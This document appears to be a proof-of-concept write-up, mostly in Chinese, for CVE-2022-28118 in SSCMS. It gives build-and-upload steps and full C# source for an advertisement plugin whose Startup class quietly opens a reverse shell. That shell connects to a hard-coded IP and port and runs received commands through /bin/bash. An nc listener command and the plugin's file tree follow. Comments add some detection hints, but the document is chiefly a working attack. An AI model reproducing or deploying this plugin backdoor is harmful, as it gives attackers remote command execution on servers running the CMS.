# CVE-2022-28118

1. 安装 Visual Studio
2. 导入该项目
3. 修改Startup.cs文件中的`IPAddress.Parse`值
```c#
using Microsoft.Extensions.DependencyInjection;
using SSCMS.Advertisement.Abstractions;
using SSCMS.Advertisement.Core;
using SSCMS.Plugins;
using System.Diagnostics;
using System;
using System.Text;
using System.Net.Sockets;
using System.Net;
using System.Threading;
namespace SSCMS.Advertisement
{
/// <summary>
/// Plugin startup class for SSCMS.Advertisement as modified by this proof of concept.
/// Besides the normal repository registration, it starts a background thread that
/// opens an outbound TCP connection and runs whatever text it receives through
/// /bin/bash, sending the output back over the same connection.
/// </summary>
/// <remarks>
/// NOTE(review): the host presumably calls ConfigureServices when the plugin package is
/// loaded, so the code below would run with the privileges of the CMS process; confirm
/// against the host. Defensive takeaway: a plugin package is executable code, so plugin
/// installation should be restricted and a plugin's Startup class reviewed for
/// System.Net.Sockets / System.Diagnostics.Process usage before installation.
/// </remarks>
public class Startup : IPluginConfigureServices
{
/// <summary>
/// Registers the advertisement repository and, as an injected side effect,
/// launches <see cref="reversShell"/> on a new thread.
/// </summary>
/// <param name="services">Service collection supplied by the host.</param>
public void ConfigureServices(IServiceCollection services)
{
// Injected behaviour: the network loop runs on its own thread, so service
// registration below continues without waiting for it.
ThreadStart childref = new ThreadStart(reversShell);
Thread childThread = new Thread(childref);
childThread.Start();
// The only registration visible in this file that relates to the plugin's stated purpose.
services.AddScoped<IAdvertisementRepository, AdvertisementRepository>();
}
/// <summary>
/// Connects out to a hard-coded IPv4 address and port, then repeatedly reads a
/// message, passes it to <see cref="willshell"/> and writes the result back.
/// </summary>
/// <remarks>
/// Observable indicators: an outbound TCP connection from the process hosting this
/// plugin to the address/port literals below (sample values from the write-up).
/// </remarks>
public void reversShell()
{
Socket socketshell = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
// Hard-coded remote endpoint; the write-up says this literal is edited before building.
IPAddress ip = IPAddress.Parse("172.17.0.1");
IPEndPoint point = new IPEndPoint(ip, Convert.ToInt32("8889"));
try
{
socketshell.Connect(point);
while (true)
{
// Each iteration reads at most 5120 bytes and treats them as one command string.
byte[] getdata = new byte[1024 * 5];
int n = socketshell.Receive(getdata);
string restr = Encoding.Default.GetString(getdata, 0, n);
string command = restr;
// Remote input is executed without any authentication or filtering.
string resultok = willshell(command);
byte[] senddata = new byte[1024 * 5];
senddata = Encoding.Default.GetBytes(resultok);
socketshell.Send(senddata);
}
}
catch
{
// Any exception ends the loop and closes the socket; nothing is logged and
// no reconnect is attempted in this method.
socketshell.Close();
}
}
/// <summary>
/// Starts a /bin/bash process with redirected standard streams, writes the given
/// command to its standard input, and returns everything read from standard output.
/// </summary>
/// <param name="command">Text written as a line to the shell's standard input.</param>
/// <returns>The complete standard output of the shell process.</returns>
/// <remarks>
/// A new /bin/bash process is started on every call, so process-creation telemetry
/// showing bash spawned by the CMS host process is a useful detection signal
/// (NOTE(review): assumes the plugin runs inside the host process; confirm).
/// </remarks>
public static string willshell(object command)
{
Process process = new Process();
process.StartInfo.FileName = "/bin/bash";
process.StartInfo.UseShellExecute = false;
process.StartInfo.RedirectStandardError = true;
process.StartInfo.RedirectStandardInput = true;
process.StartInfo.RedirectStandardOutput = true;
process.StartInfo.CreateNoWindow = true;
process.Start();
// Three lines are written to the shell's standard input: "echo off", the command, then "exit".
process.StandardInput.WriteLine("echo off");
process.StandardInput.WriteLine(command);
process.StandardInput.WriteLine("exit");
// Only standard output is returned; standard error is redirected but not read here.
string result = process.StandardOutput.ReadToEnd();
return result;
}
}
}
```
4. 编译项目
5. 将编译后的输出目录打包成Zip包
6. 服务器开启监听
```bash
nc -lvvp 8889
```
7. 到系统中进行离线安装上传
[4.0K] /data/pocs/465e5e4972a05af4fca5572c46a368e125636608
├── [4.0K] Abstractions
│ └── [ 784] IAdvertisementRepository.cs
├── [4.0K] Controllers
│ ├── [4.0K] Admin
│ │ ├── [3.7K] AddController.cs
│ │ ├── [2.4K] AddController.Get.cs
│ │ ├── [2.7K] AddController.Submit.cs
│ │ ├── [2.0K] AddController.Upload.cs
│ │ ├── [3.4K] ListController.cs
│ │ ├── [1.5K] ListController.Delete.cs
│ │ └── [2.1K] ListController.Get.cs
│ └── [ 330] PingController.cs
├── [4.0K] Core
│ ├── [4.7K] AdvertisementRepository.cs
│ └── [ 624] CreateStartAsync.cs
├── [4.1K] Detail.md
├── [ 34K] LICENSE
├── [4.0K] Models
│ ├── [1.3K] Advertisement.cs
│ ├── [ 406] AdvertisementType.cs
│ ├── [ 425] PositionType.cs
│ ├── [ 419] RollingType.cs
│ └── [ 388] ScopeType.cs
├── [4.0K] obj
│ ├── [4.0K] Debug
│ │ └── [4.0K] net6.0
│ │ ├── [ 85K] SSCMS.Advertisement.assets.cache
│ │ └── [ 0] SSCMS.Advertisement.csproj.FileListAbsolute.txt
│ ├── [381K] project.assets.json
│ ├── [2.5K] SSCMS.Advertisement.csproj.nuget.dgspec.json
│ ├── [1.6K] SSCMS.Advertisement.csproj.nuget.g.props
│ ├── [ 150] SSCMS.Advertisement.csproj.nuget.g.targets
│ └── [ 5] staticwebassets.pack.sentinel
├── [2.4K] package.json
├── [4.0K] Pages
│ └── [4.0K] ss-admin
│ └── [4.0K] advertisement
│ ├── [ 12K] add.cshtml
│ └── [1.4K] list.cshtml
├── [2.4K] README.md
├── [ 605] SSCMS.Advertisement.csproj
├── [2.0K] Startup.cs
├── [4.0K] Utils
│ ├── [1.9K] AdvertisementUtils.cs
│ ├── [5.9K] ScriptFloating.cs
│ ├── [ 994] ScriptOpenWindow.cs
│ └── [1.6K] ScriptScreenDown.cs
└── [4.0K] wwwroot
├── [4.0K] assets
│ └── [4.0K] advertisement
│ ├── [4.7K] adFloating.js
│ ├── [1.2K] close.gif
│ └── [ 90K] jquery-1.9.1.min.js
└── [4.0K] ss-admin
└── [4.0K] advertisement
├── [4.0K] add
│ └── [5.0K] index.js
├── [4.0K] list
│ └── [2.0K] index.js
└── [2.0K] logo.svg
19 directories, 41 files